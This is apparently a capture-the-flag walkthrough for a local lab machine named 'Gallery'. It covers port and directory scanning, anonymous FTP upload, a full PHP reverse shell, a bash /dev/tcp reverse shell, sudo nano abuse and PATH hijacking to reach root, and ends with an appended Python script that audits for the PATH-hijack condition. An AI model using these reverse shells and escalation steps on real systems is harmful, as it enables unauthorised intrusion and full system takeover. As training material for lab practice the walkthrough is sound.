GALLERY MACHINE

 GALLERY

┌──(root㉿kali)-[/home/luis/Descargas/galeria]
└─# bash auto_deploy.sh galeria.tar

                        ##        .         
                  ## ## ##       ==         
               ## ## ## ##      ===         
           /""""""""""""""""\___/ ===       
      ~~~ {~~ ~~~~ ~~~ ~~~~ ~~ ~ /  ===- ~~~
           \______ o          __/           
             \    \        __/            
              \____\______/               
                                          
  ___  ____ ____ _  _ ____ ____ _    ____ ___  ____
  |  \ |  | |    |_/  |___ |__/ |    |__| |__] [__  
  |__/ |__| |___ | \_ |___ |  \ |___ |  | |__] ___]
                                         
                     

Estamos desplegando la máquina vulnerable, espere un momento.

Máquina desplegada, su dirección IP es --> 172.17.0.2

Presiona Ctrl+C cuando termines con la máquina para eliminarla

First of all, we have to execute this command and we should see if there is connectivity between both machines as you can see below.
┌──(root㉿kali)-[/home/luis]
└─# ping -c3 172.17.02
PING 172.17.02 (172.17.0.2) 56(84) bytes of data.
64 bytes from 172.17.0.2: icmp_seq=1 ttl=64 time=0.204 ms
64 bytes from 172.17.0.2: icmp_seq=2 ttl=64 time=0.037 ms
64 bytes from 172.17.0.2: icmp_seq=3 ttl=64 time=0.054 ms

--- 172.17.02 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2037ms
rtt min/avg/max/mdev = 0.037/0.098/0.204/0.075 ms

┌──(root㉿kali)-[/home/luis]
└─# nmap -n -Pn -p- --min-rate 5000 -sC 172.17.0.2 -vvv
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-06 07:53 CEST
NSE: Loaded 126 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 07:53
Completed NSE at 07:53, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 07:53
Completed NSE at 07:53, 0.00s elapsed
Initiating ARP Ping Scan at 07:53
Scanning 172.17.0.2 [1 port]
Completed ARP Ping Scan at 07:53, 0.10s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 07:53
Scanning 172.17.0.2 [65535 ports]
Discovered open port 80/tcp on 172.17.0.2
Completed SYN Stealth Scan at 07:53, 1.33s elapsed (65535 total ports)
NSE: Script scanning 172.17.0.2.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 07:53
Completed NSE at 07:53, 0.15s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 07:53
Completed NSE at 07:53, 0.00s elapsed
Nmap scan report for 172.17.0.2
Host is up, received arp-response (0.0000070s latency).
Scanned at 2025-09-06 07:53:04 CEST for 1s
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE REASON
80/tcp open  http    syn-ack ttl 64
| http-methods:
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-title: Gallery
MAC Address: 02:42:AC:11:00:02 (Unknown)


NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 07:53
Completed NSE at 07:53, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 07:53
Completed NSE at 07:53, 0.00s elapsed
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 2.14 seconds
           Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)

Here we can see the webpage, whose title is Gallery, but nothing else.


Now that we know the open port is 80 (HTTP), we should look for directories, files, etc. with the command you can see below.
┌──(root㉿kali)-[/home/luis]
└─# gobuster dir -u "http://172.17.0.2/"  -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x baak,txt,php,tar
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://172.17.0.2/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.8
[+] Extensions:              tar,baak,txt,php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/gallery              (Status: 301) [Size: 310] [--> http://172.17.0.2/gallery/]
/server-status        (Status: 403) [Size: 275]
Progress: 1102785 / 1102785 (100.00%)

===============================================================
Finished
===============================================================

In addition, we must create a reverse shell, as you can see below. This reverse shell comes from the pentestmonkey GitHub repository, which you can find here:


<?php
// php-reverse-shell - A Reverse Shell implementation in PHP. Comments stripped to slim it down. RE: https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net

set_time_limit (0);
$VERSION = "1.0";
$ip = '172.17.0.1';
$port = 443;
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/bash -i';
$daemon = 0;
$debug = 0;

if (function_exists('pcntl_fork')) {
        $pid = pcntl_fork();

        if ($pid == -1) {
                printit("ERROR: Can't fork");
                exit(1);
        }

        if ($pid) {
                exit(0);  // Parent exits
        }
        if (posix_setsid() == -1) {
                printit("Error: Can't setsid()");
                exit(1);
        }

        $daemon = 1;
} else {
        printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}

chdir("/");

umask(0);

// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
        printit("$errstr ($errno)");
        exit(1);
}

$descriptorspec = array(
   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
        printit("ERROR: Can't spawn shell");
        exit(1);
}

stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
        if (feof($sock)) {
                printit("ERROR: Shell connection terminated");
                break;
        }

        if (feof($pipes[1])) {
                printit("ERROR: Shell process terminated");
                break;
        }

        $read_a = array($sock, $pipes[1], $pipes[2]);
        $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

        if (in_array($sock, $read_a)) {
                if ($debug) printit("SOCK READ");
                $input = fread($sock, $chunk_size);
                if ($debug) printit("SOCK: $input");
                fwrite($pipes[0], $input);
        }

        if (in_array($pipes[1], $read_a)) {
                if ($debug) printit("STDOUT READ");
                $input = fread($pipes[1], $chunk_size);
                if ($debug) printit("STDOUT: $input");
                fwrite($sock, $input);
        }

        if (in_array($pipes[2], $read_a)) {
                if ($debug) printit("STDERR READ");
                $input = fread($pipes[2], $chunk_size);
                if ($debug) printit("STDERR: $input");
                fwrite($sock, $input);
        }
}

// Helper used throughout the script: it is part of the original pentestmonkey file but was
// missing from the listing above. It prints only while the process is not daemonised.
function printit ($string) {
        global $daemon;
        if (!$daemon) {
                print "$string\n";
        }
}

Now, we must see if it's possible to attack port 21, as you can see below with the nmap command.
┌──(root㉿kali)-[/home/luis]
└─# nmap -n -Pn -p 21 --min-rate 5000 -sC 172.17.0.2 -vvv
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-06 08:10 CEST
NSE: Loaded 126 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 08:10
Completed NSE at 08:10, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 08:10
Completed NSE at 08:10, 0.00s elapsed
Initiating ARP Ping Scan at 08:10
Scanning 172.17.0.2 [1 port]
Completed ARP Ping Scan at 08:10, 0.10s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 08:10
Scanning 172.17.0.2 [1 port]
Discovered open port 21/tcp on 172.17.0.2
Completed SYN Stealth Scan at 08:10, 0.02s elapsed (1 total ports)
NSE: Script scanning 172.17.0.2.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 08:10
NSE: [ftp-bounce 172.17.0.2:21] PORT response: 500 Illegal PORT command.
Completed NSE at 08:10, 0.18s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 08:10
Completed NSE at 08:10, 0.00s elapsed
Nmap scan report for 172.17.0.2
Host is up, received arp-response (0.000048s latency).
Scanned at 2025-09-06 08:10:14 CEST for 0s

PORT   STATE SERVICE REASON
21/tcp open  ftp     syn-ack ttl 64
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 172.17.0.1
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.5 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 550 Permission denied.
MAC Address: 02:42:AC:11:00:02 (Unknown)


NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 08:10
Completed NSE at 08:10, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 08:10
Completed NSE at 08:10, 0.00s elapsed
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.67 seconds
           Raw packets sent: 2 (72B) | Rcvd: 2 (72B)

Now we should be able to log in to the machine with the default credentials, which are user anonymous, as you can see below.
┌──(root㉿kali)-[/home/luis]
└─# ftp 172.17.0.2
Connected to 172.17.0.2.
220 (vsFTPd 3.0.5)
Name (172.17.0.2:luis): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
550 Permission denied.
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xrwx    1 ftp      ftp          4096 Mar 30 06:44 ftp
-rw-r--r--    1 ftp      ftp        335070 Mar 27 22:57 image_1.jpg
-rw-r--r--    1 ftp      ftp        442122 Mar 27 22:57 image_2.jpg
-rw-r--r--    1 ftp      ftp        459934 Mar 27 22:57 image_3.jpg
-rw-r--r--    1 ftp      ftp        319652 Mar 27 22:57 image_4.jpg
-rw-r--r--    1 ftp      ftp        480742 Mar 27 22:57 image_5.jpg
-rw-r--r--    1 ftp      ftp        493404 Mar 27 22:57 image_6.jpg
-rw-r--r--    1 ftp      ftp        434472 Mar 27 22:57 image_7.jpg
226 Directory send OK.

Now, we have to test whether it is possible to upload a file to the FTP server, as you can see below, using the commands echo (create the file) and put (upload it), checking the result both from the terminal and from the website.

┌──(luis㉿kali)-[~]
└─$ echo "prueba" >text.php
ftp> cd ftp
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xrwx    1 ftp      ftp          4096 Mar 30 06:44 .
drwxr-xr-x    1 ftp      ftp          4096 Mar 30 05:15 ..
226 Directory send OK.
ftp> put text.php
local: text.php remote: text.php
200 PORT command successful. Consider using PASV.
150 Ok to send data.
100% |*********************************************************************************|     7        3.72 KiB/s    00:00 ETA
226 Transfer complete.

7 bytes sent in 00:00 (2.28 KiB/s)



ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 ftp      ftp             7 Sep 06 06:18 text.php
226 Directory send OK.

Now we can upload the shell to the FTP server with the command put reverse.php (upload file), as you can see below.

ftp> put reverse.php
local: reverse.php remote: reverse.php
200 PORT command successful. Consider using PASV.
150 Ok to send data.
100% |*********************************************************************************|  2590       19.44 MiB/s    00:00 ETA
226 Transfer complete.
2590 bytes sent in 00:00 (5.40 MiB/s)


ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 ftp      ftp          2590 Sep 06 06:21 reverse.php
-rw-r--r--    1 ftp      ftp             7 Sep 06 06:18 text.php


Now we have to open the port (listen with netcat), and then we should obtain the shell on the attacker machine, as you can see below.
┌──(luis㉿kali)-[~]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [172.17.0.1] from (UNKNOWN) [172.17.0.2] 50812
Linux 4f8d34fa037a 6.12.38+kali-amd64 #1 SMP PREEMPT_DYNAMIC Kali 6.12.38-1kali1 (2025-08-12) x86_64 x86_64 x86_64 GNU/Linux
 00:22:54 up 43 min,  0 user,  load average: 0.41, 0.78, 1.84
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU  WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash: cannot set terminal process group (24): Inappropriate ioctl for device
bash: no job control in this shell

Now we must execute the following commands to stabilize the shell (obtain a fully interactive TTY) in the machine, as you can see below, which are:
  1. script /dev/null -c bash
  2. ^Z
  3. stty raw -echo;fg
  4. reset xterm
  5. export TERM=xterm
  6. export SHELL=bash
www-data@4f8d34fa037a:/$
www-data@4f8d34fa037a:/$ script /dev/null -c bash
script /dev/null -c bash
Script started, output log file is '/dev/null'.
www-data@4f8d34fa037a:/$ ^Z
zsh: suspended  nc -lvnp 443

┌──(luis㉿kali)-[~]
└─$ stty raw -echo;fg
[1]  + continued  nc -lvnp 443
                              reset xterm
www-data@4f8d34fa037a:/$ export SHELL=bash
www-data@4f8d34fa037a:/$ export TERM=xterm


Now that we have a stable shell, we should start the privilege escalation with the first command, which is the following, as you can see below.
www-data@4f8d34fa037a:/$ sudo -l
Matching Defaults entries for www-data on 4f8d34fa037a:
    env_reset, mail_badpass, use_pty

User www-data may run the following commands on 4f8d34fa037a:
    (gallery) NOPASSWD: /bin/nano
    (www-data) NOPASSWD: /bin/nano

As we can see, www-data can run /bin/nano as the gallery user, so we should be able to switch to that user; we look up nano on the GTFOBins website to obtain more information, as you can see below.

These are the steps, as you can see below.
Control+R
Control+X
Command to execute: reset; sh 1>&0 2>&0


Now we have to execute this command to obtain a reverse shell again, as you can see below, but first we have to stabilize the shell again as before.

First of all, we have to go to this webpage, which you can see in the picture below, at this link:


Now we have to execute the shell command as you can see below, and then we have to open port 4444 with the netcat toolkit.
gallery@4f8d34fa037a:/$ bash -i >& /dev/tcp/172.17.0.1/4444 0>&1
┌──(luis㉿kali)-[~]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [172.17.0.1] from (UNKNOWN) [172.17.0.2] 47154
gallery@4f8d34fa037a:/$

Now we have to execute sudo -l to see our permissions on the Linux system, and then let's go and obtain the root session.
gallery@4f8d34fa037a:/$ sudo -l
sudo -l
Matching Defaults entries for gallery on 4f8d34fa037a:
    env_reset, mail_badpass, env_keep+=PATH, use_pty

User gallery may run the following commands on 4f8d34fa037a:
    (ALL) NOPASSWD: /usr/local/bin/runme

Now we must execute the following commands again to stabilize the shell (obtain a fully interactive TTY) in the machine, as you can see below, which are:
  1. script /dev/null -c bash
  2. ^Z
  3. stty raw -echo;fg
  4. reset xterm
  5. export TERM=xterm
  6. export SHELL=bash
gallery@b1895c78583f:/$ script /dev/null -c bash
script /v/null -c bash
Script started, output log file is '/v/null'.
script: cannot open /v/null: No such file or directory
Script done.
gallery@b1895c78583f:/$ ^Z
zsh: suspended  nc -lvnp 4444
┌──(luis㉿kali)-[~]
└─$ stty raw -echo;fg
[1]  + continued  nc -lvnp 4444
                               reset xterm


Now we have to execute the strings command, with which we will see how we can obtain a root session, as you can see below.

gallery@4f8d34fa037a:/$ strings /usr/local/bin/runme
Converting image...
convert /var/www/html/gallery/uploads/images/input.png /var/www/html/gallery/uploads/images/output.jpg
gallery@4f8d34fa037a:/$ convert
convert
bash: convert: command not found
gallery@4f8d34fa037a:/$ sudo /usr/local/bin/runme
sudo /usr/local/bin/runme
sh: 1: convert: not found
Converting image...
Done.

We must do the following steps and create a convert command in the Linux PATH, as you can see below:
  • nano convert
  • chmod 777 convert
  • export PATH=.:$PATH
  • echo $PATH
  • sudo /usr/local/bin/runme
gallery@b1895c78583f:/tmp$ nano convert
gallery@b1895c78583f:/tmp$ chmod 777 convert
gallery@b1895c78583f:/tmp$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
gallery@b1895c78583f:/tmp$ export PATH=.:$PATH
gallery@b1895c78583f:/tmp$ echo $PATH
.:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User gallery may run the following commands on b1895c78583f:
    (ALL) NOPASSWD: /usr/local/bin/runme
gallery@b1895c78583f:/tmp$ sudo /usr/local/bin/runme

Gotcha! We have become root.
Converting image...
root@b1895c78583f:/tmp#
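As an added example (not part of the write-up), here is a small Python audit that turns the two signals above into a check: it parses `sudo -l` output for `env_keep+=PATH` and NOPASSWD rules, and scans the `strings` output of the allowed binary for helper commands invoked without an absolute path. The sample inputs are constructed from the output shown on this page; the heuristic for spotting bare command words is an assumption of this example.

```python
import re
# Constructed samples copied from this write-up: `sudo -l` for the gallery user
# and `strings /usr/local/bin/runme`.
SUDO_L_GALLERY = """\
Matching Defaults entries for gallery on 4f8d34fa037a:
    env_reset, mail_badpass, env_keep+=PATH, use_pty

User gallery may run the following commands on 4f8d34fa037a:
    (ALL) NOPASSWD: /usr/local/bin/runme
"""
RUNME_STRINGS = """\
Converting image...
convert /var/www/html/gallery/uploads/images/input.png /var/www/html/gallery/uploads/images/output.jpg
Done.
"""
RULE_RE = re.compile(r"\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+)")

def parse_sudo_l(text):
    """Split `sudo -l` output into the Defaults set and (runas, tags, command) rules."""
    defaults, rules, section = set(), [], None
    for raw in text.splitlines():
        line = raw.strip()
        if raw.startswith("Matching Defaults"):
            section = "defaults"
        elif raw.startswith("User "):
            section = "rules"
        elif line and section == "defaults":
            defaults.update(tok.strip() for tok in line.split(","))
        elif line and section == "rules" and (m := RULE_RE.match(line)):
            tags = [t for t in m.group("tags").replace(" ", "").split(":") if t]
            rules.append((m.group("runas"), tags, m.group("cmd").strip()))
    return defaults, rules

def bare_commands(strings_text):
    """Assumed heuristic: 'cmd arg ...' with a bare lowercase first word (no slash) is a PATH lookup."""
    found = []
    for line in strings_text.splitlines():
        parts = line.split()
        if len(parts) > 1 and re.fullmatch(r"[a-z][a-z0-9_-]*", parts[0]) and parts[0] not in found:
            found.append(parts[0])
    return found

def path_hijack_findings(sudo_text, strings_by_cmd):
    """strings_by_cmd maps each sudo-allowed command to its `strings` output."""
    defaults, rules = parse_sudo_l(sudo_text)
    keeps_path = any(d.startswith("env_keep") and "PATH" in d for d in defaults)
    findings = ["Defaults keeps the caller's PATH across sudo (env_keep+=PATH)"] if keeps_path else []
    for runas, tags, cmd in rules:
        if "NOPASSWD" in tags:
            findings.append(f"{cmd} runs as ({runas}) without a password")
        for helper in bare_commands(strings_by_cmd.get(cmd, "")):
            fix = "fix: absolute path in the binary, drop env_keep+=PATH" if keeps_path else "verify secure_path"
            findings.append(f"{cmd} resolves '{helper}' through PATH ({fix})")
    return findings
```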

I hope you liked it and learned something new

This article has been done for ethical purposes

Good Hack
